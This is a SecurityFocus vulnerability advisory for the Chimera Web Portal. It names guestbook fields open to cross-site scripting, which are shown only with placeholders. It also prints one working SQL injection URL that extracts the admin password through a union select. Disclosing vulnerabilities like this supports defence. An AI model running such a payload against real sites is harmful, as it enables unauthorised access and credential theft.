Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Chimera Web Portal Multiple Input Validation Vulnerabilities

The following examples were provided:

Cross-site Scripting -

http://www.example.com/chimera/modules.php?name=guestbook&file=index
comment_poster=XSS
comment_poster_email=XSS
comment_poster_homepage=XSS
comment_text=XSS

SQL Injection -

http://www.example.com/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/*







 

Privacy Statement
Copyright 2009, SecurityFocus